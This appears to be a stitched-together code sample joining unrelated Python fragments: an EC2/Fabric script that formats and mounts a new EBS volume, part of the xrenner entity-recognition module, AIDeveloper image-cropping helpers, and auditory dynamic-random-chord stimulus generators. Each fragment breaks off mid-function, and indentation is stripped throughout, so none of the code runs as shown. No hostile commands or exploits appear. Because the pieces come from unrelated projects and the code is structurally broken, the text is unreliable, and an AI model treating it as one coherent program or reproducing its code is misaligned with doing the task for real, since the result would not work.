_fatal('Failed to see new EBS volume become available in %d seconds!' % maxTime)
time.sleep(2)
_status('New EBS volume created, tagging it ...')
tagsOnInstance['Name'] = tagsOnInstance['Name']+'_vol0'
tagsOnInstance.pop('numInstanceStores', None)
ec2.create_tags([vol.id], tagsOnInstance)
result = ec2.attach_volume (vol.id, instanceId, "/dev/"+device)
_status('Attach EBS vol %s to instance %s returned status: %s' % (vol.id, instanceId, result))
time.sleep(5)
attachStatus = "unknown"
deviceId = "?"
totalTime = 0
while attachStatus != "attached" and totalTime < maxTime:
curr_vol = ec2.get_all_volumes([vol.id])[0]
attachStatus = curr_vol.attach_data.status
deviceId = curr_vol.attach_data.device
_status('Attached EBS vol %s to instance %s has status: %s' % (vol.id, instanceId, attachStatus))
if attachStatus != "attached":
time.sleep(10)
totalTime += 10
if attachStatus != "attached":
_fatal('Failed to attach new EBS vol %s to instance %s within %d seconds!' % (vol.id, instanceId, maxTime))
_info('Successfully attached new EBS vol %s to instance %s at device %s ... mounting at /vol0' % (vol.id, instanceId, deviceId))
v = 0
xdevs = ['xv'+device[1:]]
with settings(host_string=instanceHost):
sudo('mkfs -F -t ext4 /dev/%s || true' % xdevs[v])
sudo('mkdir /vol%d' % v)
sudo('echo "/dev/%s /vol%d ext4 defaults 0 2" >> /etc/fstab' % (xdevs[v], v))
sudo('mount /vol%d' % v)
# grant ownership to our ssh user
sudo('chown -R %s: /vol%d' % (ssh_user, v))
ec2.close()
# -----------------------------------------------------------------------------
# Fabric actions begin here ... anything above this are private helper methods.
# -----------------------------------------------------------------------------
def new_ec2_instances(cluster,
n=1,
maxWait=180,
instance_type=None,
ami=None,
key=None,
az=None,
placement_group=None,
skipStores=None,
purpose=None,
project=None,
vpcSubnetId=None,
vpcSecurityGroupId=None,
customTags='{"CostCenter":"eng"}',
rootEbsVolSize=None,
mntEbsVolSize=None):
"""
Launches one or more instances in EC2; each instance is tagged with a cluster id and username.
SSH connectivity to each instance is verified before this command returns with a maximum wait
of 3 minutes.
Example:
Provision 4 instances tagged with the cluster ID "cloud1": fab new_ec2_instances:cloud1,n=4
Arg Usage:
cluster: A short but informative identifier for the cluster you are launching.
n (int, optional): Number of instances to launch; running this command will cost at least
the per hour instance price * n, so be careful.
maxWait (int, optional): Maximum number of seconds to wait for the instances to be online;
default is 180 seconds.
instance_type (optional): Amazon EC2 instance instance_type, default is r3.large
ami (optional): AMI ID, defaults to using the config value for AWS_HVM_AMI_ID in ~/.sstk
key (optional): SSH key pair name, | |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import re
from collections import defaultdict, OrderedDict
from .xrenner_classes import Markable
from six import iteritems, iterkeys
"""
Marker module for markable entity recognition. Establishes compatibility between entity features
and determines markable extension in tokens
Author: <NAME>
"""
def is_atomic(mark, atoms, lex):
"""
Checks if nested markables are allowed within this markable
:param mark: the :class:`.Markable` to be checked for atomicity
:param atoms: list of atomic markable text strings
:param lex: the :class:`.LexData` object with gazetteer information and model settings
:return: bool
"""
marktext = mark.text.strip()
# Do not accept a markable [New] within atomic [New Zealand]
if marktext in atoms:
return True
elif marktext.lower() in atoms:
return True
# Remove possible prefix tokens to reject [The [United] Kingdom] if [United Kingdom] in atoms
elif remove_prefix_tokens(marktext, lex).strip() in atoms:
return True
# Remove possible suffix tokens to reject [[New] Zealand 's] is [New Zealand] in atoms
elif remove_suffix_tokens(marktext, lex).strip() in atoms:
return True
elif remove_infix_tokens(marktext, lex).strip() in atoms:
return True
# Combination of prefix and suffix to reject [The [United] Kingdom 's]
elif mark.core_text in atoms:
return True
elif replace_head_with_lemma(mark) in atoms:
return True
# Dynamic generation of proper name pattern
elif 0 < marktext.strip().count(" ") < 3 and marktext.strip().split(" ")[0] in lex.first_names and marktext.strip().split(" ")[-1] in lex.last_names:
return True
else:
non_essential_modifiers = list(mod.text for mod in mark.head.modifiers if lex.filters["non_essential_mod_func"].match(mod.func))
if len(non_essential_modifiers) > 0:
mark_unmod_text = mark.core_text
for mod in non_essential_modifiers:
mark_unmod_text = mark_unmod_text.replace(mod+" ","")
if mark_unmod_text in lex.atoms:
return True
# Not an atom, nested markables allowed
return False
def remove_suffix_tokens(marktext, lex):
"""
Remove trailing tokens such as genitive 's and other tokens configured as potentially redundant to citation form
:param marktext: the markable text string to remove tokens from
:param lex: the :class:`.LexData` object with gazetteer information and model settings
:return: potentially truncated text
"""
if lex.filters["core_suffixes"].search(marktext):
return lex.filters["core_suffixes"].sub(" ", marktext)
else:
tokens = marktext.split(" ")
suffix_candidate = ""
for token in reversed(tokens):
suffix_candidate = token + " " + suffix_candidate
if suffix_candidate.strip() in lex.affix_tokens:
if lex.affix_tokens[suffix_candidate.strip()] == "prefix":
return re.sub(suffix_candidate + r'$', "", marktext)
return marktext
def remove_prefix_tokens(marktext, lex):
"""
Remove leading tokens such as articles and other tokens configured as potentially redundant to citation form
:param marktext: the markable text string to remove tokens from
:param lex: the :class:`.LexData` object with gazetteer information and model settings
:return: potentially truncated text
"""
if lex.filters["core_prefixes"].match(marktext): # NB use initial match here
return lex.filters["core_prefixes"].sub(" ", marktext)
else:
tokens = marktext.split(" ")
prefix_candidate = ""
for token in tokens:
prefix_candidate += token + " "
if prefix_candidate.strip() in lex.affix_tokens:
if lex.affix_tokens[prefix_candidate.strip()] == "prefix":
return re.sub(r'^' + prefix_candidate, "", marktext)
return marktext
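# --- Illustrative usage sketch -------------------------------------------------
# A minimal sketch of the affix-stripping helpers above, using a mock object in
# place of a real LexData instance. The regexes and empty affix_tokens below are
# assumptions for illustration only, not xrenner's actual language model.
def _demo_remove_affix_tokens():
    class _MockLex(object):
        filters = {"core_prefixes": re.compile(r'^(?:the|a|an)\s+', re.IGNORECASE),
                   "core_suffixes": re.compile(r"\s+'s\s*$")}
        affix_tokens = {}
    lex = _MockLex()
    assert remove_prefix_tokens("the United Kingdom", lex).strip() == "United Kingdom"
    assert remove_suffix_tokens("New Zealand 's", lex).strip() == "New Zealand"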
def remove_infix_tokens(marktext, lex):
"""
Remove infix tokens such as dashes, interfixed articles (in Semitic construct state) etc.
:param marktext: the markable text string to remove tokens from
:param lex: the :class:`.LexData` object with gazetteer information and model settings
:return: potentially truncated text
"""
return lex.filters["core_infixes"].sub(" ", marktext)
def resolve_mark_entity(mark, lex):
"""
Main function to set entity type based on progressively less restricted parts of a markable's text
:param mark: The :class:`.Markable` object to get the entity type for
:param lex: the :class:`.LexData` object with gazetteer information and model settings
:return: void
"""
entity = ""
use_entity_deps = True
use_entity_sims = True
use_sequencer = True if lex.sequencer is not None else False
if "ablations" in lex.debug:
if "no_entity_dep" in lex.debug["ablations"]:
use_entity_deps = False
if "no_entity_sim" in lex.debug["ablations"]:
use_entity_sims= False
if "no_sequencer" in lex.debug["ablations"]:
use_sequencer = False
## DEBUG POINT ##
if mark.text == lex.debug["ana"] or mark.head.text == lex.debug["ana"]:
a=5
parent_text = mark.head.head_text
if mark.form == "pronoun":
if re.search(r'[12]',mark.agree): # Explicit 1st or 2nd person pronoun
entity = lex.filters["person_def_entity"]
mark.entity_certainty = 'certain'
elif mark.agree == "male" or mark.agree == "female": # Possibly human 3rd person
entity = lex.filters["person_def_entity"]
mark.entity_certainty = 'uncertain'
else:
if use_sequencer:
pred, score = mark.head.seq_pred
if pred != "O":
entity = pred
mark.entity_certainty = 'sequencer'
if use_entity_deps and entity == "":
if parent_text in lex.entity_deps:
if mark.head.func in lex.entity_deps[parent_text]:
dep_ents = dict(lex.entity_deps[parent_text][mark.head.func])
if lex.filters["no_person_agree"].match(mark.agree) is not None and lex.filters["person_def_entity"] in dep_ents:
del dep_ents[lex.filters["person_def_entity"]]
if len(dep_ents) > 0:
entity = max(iterkeys(dep_ents), key=(lambda key: dep_ents[key]))
if entity == "": # No literal match for dependency, fall back to similar heads
if parent_text in lex.similar and use_entity_sims:
similar_heads = lex.similar[parent_text]
for similar_head in similar_heads:
if similar_head in lex.entity_deps:
if mark.head.func in lex.entity_deps[similar_head]:
if lex.filters["no_person_agree"].match(mark.agree) is not None:
similar_dict = {}
for key, value in lex.entity_deps[similar_head][mark.head.func].items():
if key != lex.filters["person_def_entity"]:
similar_dict[key] = value
else:
similar_dict = lex.entity_deps[similar_head][mark.head.func]
if len(similar_dict) > 0:
entity = max(similar_dict,
key=(lambda key: similar_dict[key]))
break
if entity == "": # Entity dependency information not used; no way to guess entity
entity = lex.filters["default_entity"]
mark.entity_certainty = "uncertain"
else:
if mark.coordinate:
# For coordinate markables we expect the constituents to determine the entity in assign_coordinate_entity.
# An exception to this is when the entire coordination is listed in the entities list.
if entity == "":
entity = resolve_entity_cascade(mark.text, mark, lex)
if entity == "":
entity = resolve_entity_cascade(mark.core_text, mark, lex)
else:
if entity == "":
# Try to catch year numbers and hours + minutes
if re.match(r'^(1[456789][0-9][0-9]|20[0-9][0-9]|(2[0-3]|1?[0-9]):[0-5][0-9]|ה?תש.".)$', mark.head.text) is not None:
entity = lex.filters["time_def_entity"]
mark.entity_certainty = "uncertain"
mark.subclass = "time-unit" # TODO: de-hardwire this
mark.definiteness = "def" # literal year numbers are considered definite like 'proper names'
mark.form = "proper" # literal year numbers are considered definite like 'proper names'
if entity == "":
if re.match(r'^(([0-9]+[.,]?)+)$', mark.core_text) is not None:
entity = lex.filters["quantity_def_entity"]
mark.alt_entities.append(lex.filters["time_def_entity"])
mark.entity_certainty = "uncertain"
if entity == "":
entity = resolve_entity_cascade(mark.text, mark, lex)
if entity == "":
entity = resolve_entity_cascade(replace_head_with_lemma(mark), mark, lex)
if entity == "":
entity = resolve_entity_cascade(remove_suffix_tokens(mark.text.strip(),lex), mark, lex)
if entity == "":
entity = resolve_entity_cascade(remove_prefix_tokens(mark.text.strip(), lex), mark, lex)
if entity == "" and mark.core_text != mark.text:
entity = resolve_entity_cascade(mark.core_text, mark, lex)
if entity == "":
entity = recognize_entity_by_mod(mark, lex)
if entity == "" and mark.head.text.istitle():
if mark.head.text in lex.last_names:
modifiers_match_article = (lex.filters["articles"].match(mod.text) is not None for mod in mark.head.modifiers)
modifiers_match_first_name = (mod.text in lex.first_names for mod in mark.head.modifiers)
if any(modifiers_match_first_name) and not any(modifiers_match_article):
entity = lex.filters["person_def_entity"]
if entity == "" and mark.head.text.istitle():
entity = resolve_entity_cascade(mark.core_text.lower(), mark, lex)
if entity == "" and not mark.head.text.istitle():
entity = resolve_entity_cascade(mark.core_text[:1].upper() + mark.core_text[1:], mark, lex)
if entity == "":
entity = resolve_entity_cascade(mark.head.text, mark, lex)
if entity == "" and mark.head.text.istitle():
entity = resolve_entity_cascade(mark.head.text.lower(), mark, lex)
if entity == "" and mark.head.text.isupper():
entity = resolve_entity_cascade(mark.head.text.lower(), mark, lex)
if entity == "" and mark.head.text.isupper():
entity = resolve_entity_cascade(mark.head.text.lower().title(), mark, lex)
if entity == "" and not mark.head.lemma == mark.head.text: # Try lemma match if lemma different from token
entity = resolve_entity_cascade(mark.head.lemma, mark, lex)
if entity == "":
if (mark.head.text.istitle() or not lex.filters["cap_names"]):
if mark.head.text in lex.last_names or mark.head.text in lex.first_names:
modifiers_match_definite = (lex.filters["definite_articles"].match(mod.text) is not None for mod in mark.head.modifiers)
modifiers_match_article = (lex.filters["articles"].match(mod.text) is not None for mod in mark.head.modifiers)
modifiers_match_def_entity = (re.sub(r"\t.*","",lex.entity_heads[mod.text.strip().lower()][0]) == lex.filters["default_entity"] for mod in mark.head.modifiers if mod.text.strip().lower() in lex.entity_heads)
if not (any(modifiers_match_article) or any(modifiers_match_definite) or any(modifiers_match_def_entity)):
entity = lex.filters["person_def_entity"]
if entity == "":
# Just use sequencer if desired
if use_sequencer:
pred, score = mark.head.seq_pred
if pred != "O":
entity = pred
mark.entity_certainty = 'sequencer'
if entity == "":
# See what the affix morphology predicts for the head
head_text = mark.lemma if mark.lemma != "_" and mark.lemma != "" else mark.head.text
morph_probs = get_entity_by_affix(head_text,lex)
# Now check what the dependencies predict
dep_probs = {}
if use_entity_deps:
if parent_text in lex.entity_deps:
if mark.head.func in lex.entity_deps[parent_text]:
dep_probs.update(lex.entity_deps[parent_text][mark.head.func])
if len(dep_probs) == 0: # No literal dependency information found, check if similar heads are known
if parent_text in lex.similar:
similar_heads = lex.similar[parent_text]
for similar_head in similar_heads:
if similar_head in lex.entity_deps:
if mark.head.func in lex.entity_deps[similar_head]:
dep_probs.update(lex.entity_deps[similar_head][mark.head.func])
break
# And check what entity similar words are
sim_probs = {}
if use_entity_sims:
if mark.head.text in lex.similar:
for similar_word in lex.similar[mark.head.text]:
if similar_word in lex.entity_heads:
for entity_type in lex.entity_heads[similar_word]:
entity_string = entity_type.split("\t")[0]
if entity_string in sim_probs:
sim_probs[entity_string] += 1
else:
sim_probs.update({entity_string:1})
# Compare scores to decide between affix vs. dependency evidence vs. embeddings
dep_values = list(dep_probs[key] for key in dep_probs)
total_deps = float(sum(dep_values))
sim_values = list(sim_probs[key] for key in sim_probs)
total_sims = float(sum(sim_values))
norm_dep_probs = {}
norm_sim_probs = {}
# Normalize - each information source hedges its bets based on how many guesses it makes
for key, value in iteritems(dep_probs):
norm_dep_probs[key] = value/total_deps
for key, value in iteritems(sim_probs):
norm_sim_probs[key] = value/total_sims
joint_probs = defaultdict(float)
joint_probs.update(norm_dep_probs)
for entity in morph_probs:
joint_probs[entity] += morph_probs[entity]
for entity in norm_sim_probs:
joint_probs[entity] += norm_sim_probs[entity]
# Bias in favor of default entity to break ties
joint_probs[lex.filters["default_entity"]] += 0.0000001
entity = max(joint_probs, key=(lambda key: joint_probs[key]))
if entity != "":
mark.entity = entity
if "/" in mark.entity: # Lexicalized agreement information appended to entity
if mark.agree == "" or mark.agree is None:
mark.agree = mark.entity.split("/")[1]
elif mark.agree_certainty == "":
mark.alt_agree.append(mark.agree)
mark.agree = mark.entity.split("/")[1]
mark.entity = mark.entity.split("/")[0]
elif mark.entity == lex.filters["person_def_entity"] and mark.agree == lex.filters["default_agree"] and mark.form != "pronoun":
mark.agree = lex.filters["person_def_agree"]
mark.agree_certainty = "uncertain"
if "\t" in mark.entity: # This is a subclass bearing solution
mark.subclass = mark.entity.split("\t")[1]
mark.entity = mark.entity.split("\t")[0]
if mark.entity == lex.filters["person_def_entity"] and mark.form != "pronoun":
if mark.text in lex.names:
mark.agree = lex.names[mark.text]
if mark.entity == lex.filters["person_def_entity"] and mark.agree is None:
no_affix_mark = remove_suffix_tokens(remove_prefix_tokens(mark.text, lex), lex)
if no_affix_mark in lex.names:
mark.agree = lex.names[no_affix_mark]
if mark.entity == lex.filters["person_def_entity"] and mark.agree is None:
mark.agree = lex.filters["person_def_agree"]
mark.agree_certainty = "uncertain"
if mark.entity == "" and mark.core_text.upper() == mark.core_text and re.search(r"[A-ZÄÖÜ]", mark.core_text) is not None: # Unknown all caps entity, guess acronym default
mark.entity = lex.filters["all_caps_entity"]
mark.entity_certainty = "uncertain"
if mark.entity == "": # Unknown entity, guess default
mark.entity = lex.filters["default_entity"]
mark.entity_certainty = "uncertain"
if mark.subclass == "":
if mark.subclass == "":
mark.subclass = mark.entity
if mark.func == "title":
mark.entity = lex.filters["default_entity"]
if | |
# -*- coding: utf-8 -*-
"""
aid_img
some functions for image processing that are essential for AIDeveloper
---------
@author: maikherbig
"""
import numpy as np
import os, shutil,h5py
import pandas as pd
rand_state = np.random.RandomState(117) #to get the same random number on diff. PCs
import aid_bin
from pyqtgraph.Qt import QtWidgets
from scipy import ndimage
import cv2
import tensorflow as tf
from tensorflow.python.client import device_lib
device_types = device_lib.list_local_devices()
device_types = [device_types[i].device_type for i in range(len(device_types))]
config_gpu = tf.ConfigProto()
if device_types[0]=='GPU':
config_gpu.gpu_options.allow_growth = True
config_gpu.gpu_options.per_process_gpu_memory_fraction = 0.7
dir_root = os.path.dirname(aid_bin.__file__)#ask the module for its origin
def check_squared(images):
if images.shape[1]==images.shape[2]:
return images #everything is fine
else:
print("Image is not yet squared. Crop 1 pixel from the longer side to adjust")
#which is the smaller side?
if images.shape[1]<images.shape[2]: #height is smaller than width
images = images[:,:,0:-1]
elif images.shape[1]>images.shape[2]: #height is larger than width
images = images[:,0:-1]
print("Final size after correcting: "+str(images.shape))
return images
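# Hedged usage sketch for check_squared (illustrative only; the array shape below is hypothetical):
# a stack of 10 images of height 64 and width 65 is cropped by one pixel in width so that
# height == width afterwards.
#   import numpy as np
#   stack = np.zeros((10, 64, 65), dtype=np.uint8)
#   squared = check_squared(stack)  # prints a notice and returns an array of shape (10, 64, 64)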
def gen_crop_img(cropsize,rtdc_path,nr_events=100,replace=True,random_images=True,zoom_factor=1,zoom_order=0,color_mode='Grayscale',padding_mode='constant'):
failed,rtdc_ds = aid_bin.load_rtdc(rtdc_path)
if failed:
msg = QtWidgets.QMessageBox()
msg.setIcon(QtWidgets.QMessageBox.Information)
msg.setText(str(rtdc_ds))
msg.setWindowTitle("Error occurred during loading file")
msg.setStandardButtons(QtWidgets.QMessageBox.Ok)
msg.exec_()
return
pix = rtdc_ds.config["imaging"]["pixel size"] #get pixelation (um/pix)
images_shape = rtdc_ds["image"].shape #get shape of the images (nr.images,height,width,channels)
images = rtdc_ds["image"] #get the images
if len(images_shape)==4:#Loaded images are RGB
if images_shape[-1]==3:
channels=3
else:
print("Images have "+str(images_shape[-1])+" channels. This is (currently) not supported by AID")
return
if color_mode=='Grayscale':#User want to have Grayscale: use the luminosity formula to convert RGB to gray
print("Used luminosity formula to convert RGB to Grayscale")
images = (0.21 * images[:,:,:,:1]) + (0.72 * images[:,:,:,1:2]) + (0.07 * images[:,:,:,-1:])
images = images[:,:,:,0]
images = images.astype(np.uint8)
channels=1
elif len(images_shape)==3:#Loaded images are Grayscale
channels=1
if color_mode=='RGB':#If the user wants to use RGB, but did only load Grayscale images, simply copy the information to all 3 channels
images = np.stack((images,)*3, axis=-1)
print("Copied information to all three channels to convert Grayscale to RGB")
channels = 3 #Updates the channel-info. After the conversion we now have RGB
#HEIGHT
#Compute, if after zooming, the image would need to be cropped or padded in height
#Difference between the (zoomed) image height and the required final height?
diff_h = int(abs(cropsize-zoom_factor*images_shape[1]))
#Padding or Cropping?
if cropsize > zoom_factor*images_shape[1]: #Cropsize is larger than the image_shape
padding_h = True #if the requested image height is larger than the zoomed in version of the original images, I have to pad
diff_h = int(np.round(abs(cropsize-zoom_factor*images_shape[1])/2.0,0))
print("I will pad in height: "+str(diff_h) + " pixels on each side")
elif cropsize <= zoom_factor*images_shape[1]:
padding_h = False
diff_h = int(np.round(abs(cropsize-zoom_factor*images_shape[1])/2.0,0))
print("I will crop: "+str(diff_h) + " pixels in height")
#WIDTH
#Compute, if after zooming, the image would need to be cropped or padded in width
#Difference between the (zoomed) image width and the required final width?
diff_w = int(abs(cropsize-zoom_factor*images_shape[2]))
#Padding or Cropping?
if cropsize > zoom_factor*images_shape[2]: #Cropsize is larger than the image_shape
padding_w = True #if the requested image height is larger than the zoomed in version of the original images, I have to pad
diff_w = int(np.round(abs(cropsize-zoom_factor*images_shape[2])/2.0,0))
print("I will pad in width: "+str(diff_w) + " pixels on each side")
elif cropsize <= zoom_factor*images_shape[2]:
padding_w = False
diff_w = int(np.round(abs(cropsize-zoom_factor*images_shape[2])/2.0,0))
print("I will crop: "+str(diff_h) + " pixels in width")
pos_x,pos_y = rtdc_ds["pos_x"][:]/pix,rtdc_ds["pos_y"][:]/pix #/pix converts to pixel index
#If there is a zooming to be applied, adjust pos_x and pos_y accordingly
if zoom_factor != 1:
pos_x,pos_y = zoom_factor*pos_x,zoom_factor*pos_y
index = list(range(len(pos_x))) #define an index to track, which cells are used from the file
y1 = np.around(pos_y-cropsize/2.0)
x1 = np.around(pos_x-cropsize/2.0)
y2 = y1+cropsize
x2 = x1+cropsize
if padding_w==False: #If there is no padding in width, cells near the image border can fall out of the cropping frame
#Indices of cells that would fit into the required cropping frame (cells at the end of the image do not fit)
ind = np.where( (x1>=0) & (x2<=zoom_factor*images_shape[2]) & (y1>=0) & (y2<=zoom_factor*images_shape[1]))[0]
if padding_w==True:
ind = range(len(images))
if random_images==True:
print("I'm loading random images (from disk)")
#select a random amount of those cells
if len(ind)<1:
msg = QtWidgets.QMessageBox()
msg.setIcon(QtWidgets.QMessageBox.Information)
msg.setText("Discarded all events because too far at border of image (check zooming/cropping settings!)")
msg.setWindowTitle("Empty dataset!")
msg.setStandardButtons(QtWidgets.QMessageBox.Ok)
msg.exec_()
return
random_ind = rand_state.choice(ind, size=nr_events, replace=replace) #get random indexes, either unique (replace=False) or not unique (replace=True)
random_ind_unique = np.unique(random_ind,return_counts=True)
images_required = images[random_ind_unique[0],:,:] #now we have one copy of each image,but some images are required several times
pos_x,pos_y = pos_x[random_ind_unique[0]],pos_y[random_ind_unique[0]]
index = np.array(index)[random_ind_unique[0]]
images,Pos_x,Pos_y,indices = [],[],[],[] #overwrite images by defining the list images
for i in range(len(random_ind_unique[1])):
for j in range(random_ind_unique[1][i]):
if channels==1:
images.append(ndimage.zoom(images_required[i,:,:], zoom=zoom_factor,order=int(zoom_order)))
elif channels==3:
images.append(ndimage.zoom(images_required[i,:,:], zoom=(zoom_factor,zoom_factor,1),order=int(zoom_order)))
Pos_x.append(pos_x[i])
Pos_y.append(pos_y[i])
indices.append(index[i])
images = np.array(images)
pos_x = np.array(Pos_x)
pos_y = np.array(Pos_y)
index = np.array(indices)
permut = np.random.permutation(images.shape[0])
images = np.take(images,permut,axis=0,out=images) #Shuffle the images
pos_x = np.take(pos_x,permut,axis=0,out=pos_x) #Shuffle pos_x
pos_y = np.take(pos_y,permut,axis=0,out=pos_y) #Shuffle pos_y
index = np.take(index,permut,axis=0,out=index) #Shuffle index
if random_images==False:
print("I'm loading all images (from disk)")
#simply take all available cells
random_ind = ind #Here it is NOT a random index, but the index of all cells that are not too close to the image border
if len(ind)<1:
msg = QtWidgets.QMessageBox()
msg.setIcon(QtWidgets.QMessageBox.Information)
msg.setText("Discarded all events because too far at border of image (check zooming/cropping settings!)")
msg.setWindowTitle("Empty dataset!")
msg.setStandardButtons(QtWidgets.QMessageBox.Ok)
msg.exec_()
return
images = np.array(images)[random_ind]
if channels==1:
images = ndimage.zoom(images, zoom=(1,zoom_factor,zoom_factor),order=int(zoom_order))
elif channels==3:
images = ndimage.zoom(images, zoom=(1,zoom_factor,zoom_factor,1),order=int(zoom_order))
pos_x,pos_y = pos_x[random_ind],pos_y[random_ind]
index = np.array(index)[random_ind] #this is the original index of all used cells
if padding_h==True and padding_w==True:
if channels==1:
images = np.pad(images,pad_width=( (0, 0),(diff_h, diff_h),(diff_w, diff_w) ),mode=padding_mode)
elif channels==3:
images = np.pad(images,pad_width=( (0, 0),(diff_h, diff_h),(diff_w, diff_w),(0, 0) ),mode=padding_mode)
else:
print("Invalid image dimensions: "+str(images.shape))
return
print("Final size:"+str(images.shape)+","+str(np.array(index).shape))
#terminate the function by yielding the result
yield check_squared(images),np.array(index).astype(int)
if padding_h==False and padding_w==False:
#Compute again the x,y locations of the cells (this is fast)
y1 = np.around(pos_y-cropsize/2.0)
x1 = np.around(pos_x-cropsize/2.0)
y2 = y1+cropsize
x2 = x1+cropsize
Images_Cropped = []
for j in range(len(x2)):#crop the images
image_cropped = images[j,int(y1[j]):int(y2[j]),int(x1[j]):int(x2[j])]
#if image_cropped.shape==(cropsize,cropsize):
Images_Cropped.append(image_cropped)
images = np.r_[Images_Cropped]
print("Final size:"+str(images.shape)+","+str(np.array(index).shape))
#terminate the function by yielding the result
yield check_squared(images),np.array(index).astype(int)
if padding_h==True:
if channels==1:
images = np.pad(images,pad_width=( (0, 0),(diff_h, diff_h),(0, 0) ),mode=padding_mode)
elif channels==3:
images = np.pad(images,pad_width=( (0, 0),(diff_h, diff_h),(0, 0),(0, 0) ),mode=padding_mode)
else:
print("Invalid image dimensions: "+str(images.shape))
return
print("Image size after padding heigth :"+str(images.shape)+","+str(np.array(index).shape))
#don't yield here since cropping in width could still be required
if padding_w==True:
if channels==1:
images = np.pad(images,pad_width=( (0, 0),(0, 0),(diff_w, diff_w) ),mode=padding_mode)
elif channels==3:
images = np.pad(images,pad_width=( (0, 0),(0, 0),(diff_w, diff_w),(0, 0) ),mode=padding_mode)
else:
print("Invalid image dimensions: "+str(images.shape))
return
print("Image size after padding width :"+str(images.shape)+","+str(np.array(index).shape))
#don't yield here since cropping in height could still be required
if padding_h==False:
#Compute again the x,y locations of the cells (this is fast)
y1 = np.around(pos_y-cropsize/2.0)
y2 = y1+cropsize
Images_Cropped = []
for j in range(len(y1)):#crop the images
image_cropped = images[j,int(y1[j]):int(y2[j]),:]
Images_Cropped.append(image_cropped)
images = np.r_[Images_Cropped]
print("Image size after cropping height:"+str(images.shape)+","+str(np.array(index).shape))
if padding_w==False:
#Compute again the x,y locations of the cells (this is fast)
x1 = np.around(pos_x-cropsize/2.0)
x2 = x1+cropsize
Images_Cropped = []
for j in range(len(x2)):#crop the images
image_cropped = images[j,:,int(x1[j]):int(x2[j])]
Images_Cropped.append(image_cropped)
images = np.r_[Images_Cropped]
print("Image size after cropping width:"+str(images.shape)+","+str(np.array(index).shape))
print("Final size:"+str(images.shape)+","+str(np.array(index).shape))
yield check_squared(images),np.array(index).astype(int)
def gen_crop_img_ram(dic,rtdc_path,nr_events=100,replace=True,random_images=True):
Rtdc_path = dic["rtdc_path"]
ind = np.where(np.array(Rtdc_path)==rtdc_path)[0]
images = np.array(dic["Cropped_Images"])[ind][0]
indices = np.array(dic["Indices"])[ind][0]
ind = range(len(images))
if random_images==True:
#select a random amount of those cells
random_ind = rand_state.choice(ind, size=nr_events, replace=replace) #get random indexes, either unique (replace=False) or not unique (replace=True)
random_ind_unique = np.unique(random_ind,return_counts=True)
images_required = images[random_ind_unique[0],:,:] #now we have one copy of each image,but some images are required several times
indices_required = indices[random_ind_unique[0]]
images,indices = [],[]
for i in range(len(random_ind_unique[1])):
for j in range(random_ind_unique[1][i]):
images.append(images_required[i,:,:])
indices.append(indices_required[i])
images = np.array(images)
indices = np.array(indices)
permut = np.random.permutation(images.shape[0])
images = np.take(images,permut,axis=0,out=images) #Shuffle the images
indices = np.take(indices,permut,axis=0,out=indices) #Shuffle the images
if random_images==False:
#simply take all available cells
random_ind = ind
images = images
indices = indices
yield images,np.array(indices).astype(int)
def contrast_augm_numpy(images,fmin,fmax):
for i in range(images.shape[0]):
fac = np.random.uniform(low=fmin,high=fmax) #plus minus | |
<NAME>., & <NAME>. (1998). Optimizing sound features for cortical neurons. Science, 280(5368), 1439-1444.
<NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2003). Spectrotemporal structure of receptive fields in areas AI and AAF of mouse auditory cortex. Journal of neurophysiology, 90(4), 2660-2675.
'''
# Hard code a couple args
pip_ramp_time = 0.005
n_bins_oct = 12 # frequency bins per oct
n_bins_time = int( np.floor( dur / pip_dur ) )
n_oct = np.log2( f2/f1 )
n_bins_freq = int( np.floor( n_oct * n_bins_oct ) )
# Store stim values in matrix format
stim_matrix = np.zeros( ( n_bins_freq, n_bins_time ), dtype=np.float64 )
stim_matrix[:,:] = -np.inf
axis_time = np.arange( 0, dur, pip_dur )
axis_freq = f1 * 2 ** ( np.linspace( 0, np.log2( f2/f1 ), n_bins_freq ) )
y = np.zeros( int(fs*dur), dtype=np.float64 )
n_pips = int( np.floor( n_oct * pip_density ) )
n_pip_samples = int( pip_dur * fs )
for ii in range(n_bins_time):
freqs = np.random.choice( n_bins_freq, n_pips, replace=False ) # select frequencies to generate for time step
y0 = np.zeros( int(fs*pip_dur ), dtype=np.float64 )
for jj in range(freqs.size):
# Define tone frequency and attenuation
freq = axis_freq[ freqs[jj] ]
if isinstance(pip_atten, int):
atten = pip_atten
elif len( pip_atten ) == 1:
atten = pip_atten[0] # unwrap a single-element list so gen_tone receives a scalar attenuation
else:
atten = pip_atten[ np.random.choice( len(pip_atten), 1 )[0] ]
# Generate tone and add to chord
y1 = gen_tone( fs, pip_dur, freq, atten )
y1 = audio_ramp( y1, fs, pip_ramp_time )
y0 += y1
stim_matrix[ freqs[jj], ii ] = atten
y[ n_pip_samples * ii: n_pip_samples * (ii+1) ] = y0 / n_pips
if opt_plot:
fig, ax = plt.subplots()
im = ax.imshow( stim_matrix, cmap='RdBu', origin='lower', aspect='auto', extent=[ min(axis_time),max(axis_time), min(axis_freq),max(axis_freq) ] )
fig.colorbar(im, ax=ax)
plt.xlabel('Time (s)')
plt.ylabel('Frequency (Hz)')
return y, stim_matrix, axis_time, axis_freq
def gen_dynamic_random_chord_binaural( fs, dur, f1, f2, pip_dur, pip_atten, pip_density, p_left, opt_plot=False ):
'''
Generate dynamic random chord, binaural (audio waveform)
Similar to gen_dynamic_random_chord, except with an additional input arg specifying the proportion of tone pips presented through left and right channels.
INPUT -------
fs : audio sample rate, e.g., 48e3
dur : duration (s)
f1 : low frequency (Hz)
f2 : high frequency (Hz), should not exceed fs/2
pip_dur : duration of individual tone pips (s)
pip_atten : attenuation of individual tone pips (dB), may be integer for constant level or list for variable random level within range
pip_density : pips/oct. Typical values 2-6, must be <= 12
p_left : proportion of tone pips presented through the left channel; 1 = all left, 0.5 = equal left/right, 0 = all right
opt_plot : true/false for stim_matrix plot
RETURN -------
y : audio signal (sound pressure waveform)
stim_matrix : stimulus matrix indicating attenuation levels for each time-frequency bin
axis_time : time axis for stim matrix (s)
axis_freq : frequency axis for stim matrix (Hz)
Example 1:
fs = 48e3
dur = 3
f1 = 200.
f2 = 3200
pip_dur = 0.05
pip_atten = [0, 10, 20, 30]
pip_density = 6
p_left = 0.8
Example 2:
fs = 48e3
dur = 3
f1 = 200.
f2 = 3200
pip_dur = 0.05
pip_atten = [0, 10, 20, 30]
pip_density = 2
p_left = 0.2
References:
